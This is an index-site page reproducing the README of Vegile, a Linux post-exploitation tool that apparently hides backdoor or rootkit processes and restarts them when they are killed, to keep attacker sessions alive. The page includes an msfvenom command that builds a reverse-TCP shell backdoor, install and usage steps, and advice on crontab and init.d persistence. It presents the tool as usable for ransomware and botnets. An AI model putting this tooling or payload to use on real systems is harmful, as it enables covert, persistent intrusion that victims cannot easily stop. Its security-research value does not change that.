Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/Screetsec/Vegile
This tool will setting up your backdoor/rootkits when backdoor already setup it will be hidden your spesisifc process,unlimited your session in metasploit and transparent. Even when it killed, it will re-run again. There always be a procces which while run another process,So we can assume that this procces is unstopable like a Ghost in The Shell
https://github.com/Screetsec/Vegile
backdoor ghost indonesia infinite-scroll inject linux metasploit msfvenom post-exploitation postgresql rootkit unlimited
Last synced: 5 days ago
JSON representation
This tool will setting up your backdoor/rootkits when backdoor already setup it will be hidden your spesisifc process,unlimited your session in metasploit and transparent. Even when it killed, it will re-run again. There always be a procces which while run another process,So we can assume that this procces is unstopable like a Ghost in The Shell
- Host: GitHub
- URL: https://github.com/Screetsec/Vegile
- Owner: screetsec
- License: gpl-3.0
- Created: 2018-01-02T05:29:48.000Z (almost 7 years ago)
- Default Branch: master
- Last Pushed: 2022-09-01T01:54:35.000Z (about 2 years ago)
- Last Synced: 2024-07-30T19:03:10.726Z (3 months ago)
- Topics: backdoor, ghost, indonesia, infinite-scroll, inject, linux, metasploit, msfvenom, post-exploitation, postgresql, rootkit, unlimited
- Language: Shell
- Homepage:
- Size: 48.8 KB
- Stars: 703
- Watchers: 40
- Forks: 164
- Open Issues: 2
-
Metadata Files:
- Readme: README.md
- License: LICENSE.md
Awesome Lists containing this project
- awesome-termux-hacking - Vegile - This tool will setting up your backdoor/rootkits when backdoor already setup it will be hidden your spesisifc process,unlimited your session in metasploit and transparent. Even when it killed, it will re-run again. There always be a procces which while run another process,So we can assume that this procces is unstopable like a Ghost in The Shell.[![->](https://img.shields.io/github/stars/Screetsec/Vegile.svg?style=social&label=Star&maxAge=2592000)](https://github.com/Screetsec/Vegile/stargazers/) (Uncategorized / Uncategorized)
README
# Vegile - Ghost In The Shell
[![Version](https://img.shields.io/badge/Vegile-Beta-brightgreen.svg?maxAge=259200)]()
[![Stage](https://img.shields.io/badge/Release-Stable-brightgreen.svg)]()
[![Build](https://img.shields.io/badge/Supported_OS-Linux-orange.svg)]()**Vegile** is a tool for **Post exploitation** Techniques in linux. Post Exploitation techniques will ensure that we maintain some level of **access and can potentially** lead to **deeper** footholds into our targets **trusted network**.
### Donate
- If this project is very helpful to your penetration testing and u want to support me , you can give me a cup of coffee :)
- [![Donation](https://img.shields.io/badge/bitcoin-donate-yellow.svg)](https://blockchain.info/id/address/1NuNTXo7Aato7XguFkvwYnTAFV2immXmjS)## :book: How it works
This tool will set up your ***backdoor/rootkits***
when backdoor is already setup it will be ***hidden*** your specific process,***unlimited*** your ***session*** in metasploit and ***transparent***. Even when it is **killed**, it will **re-run again**. There will always be a procces which will **run** another process, so we can assume that this procces is **unstopable** like a **Ghost in The Shell**#### READ THIS
- Right now I just tested backdoor with msfvenom command using reverse_shell and my manual backdoor for linux [ **it works** ] or you can use thefatrat for to help you create a simple backdoor
- **msfvenom -a x86 --platform linux -p linux/x86/shell/reverse_tcp LHOST=IP LPORT=PORT -b "\x00" -f elf -o NAME_BACKDOOR**
- for hidden process you can use for **rootkits,backdoor,ransom and botnet** { sh,python,perl,exe and binary }.
- Victim target all linux distribution include ( **base32** and **base64** in their system )
- For get persistence you can use **crontab and xinit.d** into your backdoor
- this is just a simple algorithm how we can maintain our sessions and backdoor/rootkits , **you can explore this**## Getting Started
1. ```git clone https://github.com/Screetsec/Vegile.git```
2. ```cd Vegile```
3. ```chmod +x Vegile```## Using Vegile
Running Vegile without any parameters will give a helpful list of the most common options. you can use command :- Vegile -i / --inject **[backdoor/rootkit]**
- Vegile -u / --unlimited **[backdoor/rootkit]**
- Vegile -h / --help## Demo Video
- [![Vegile demo](https://user-images.githubusercontent.com/17976841/34897525-f91afc1a-f820-11e7-9f85-bb0a5f00b4e3.JPG)](https://www.youtube.com/watch?v=oYyH1G3Lsvo "Vegile Demo ")
- [![Vegile demo](https://user-images.githubusercontent.com/17976841/34897524-f887a258-f820-11e7-9ceb-a39da5be6fdf.JPG)](https://www.youtube.com/watch?v=imlh8l5w56k "Vegile Demo ")
## :octocat: Credits
- Thanks to allah
- Dracos Linux from Scratch Indonesia ( Awesome Penetration os ), you can see in http://dracos-linux.org/
- Bash.ID , WingkoColi , Reversing ID , IndoXploit , Backbox Indonesia , Depok Cyber Security and Indonesia Backtrack Team .
- Offensive Security for the awesome OS ( http://www.offensive-security.com/ )
- http://www.kali.org/ Kali Linux
- gianlucaborello to give a reference and some idea [ https://sysdig.com/blog/hiding-linux-processes-for-fun-and-profit/ ]
- And another open sources tool in github## Disclaimer
***Note: modifications, changes, or alterations to this sourcecode is acceptable, however, any public releases utilizing this code must be approved by writen this tool ( Edo maland ).***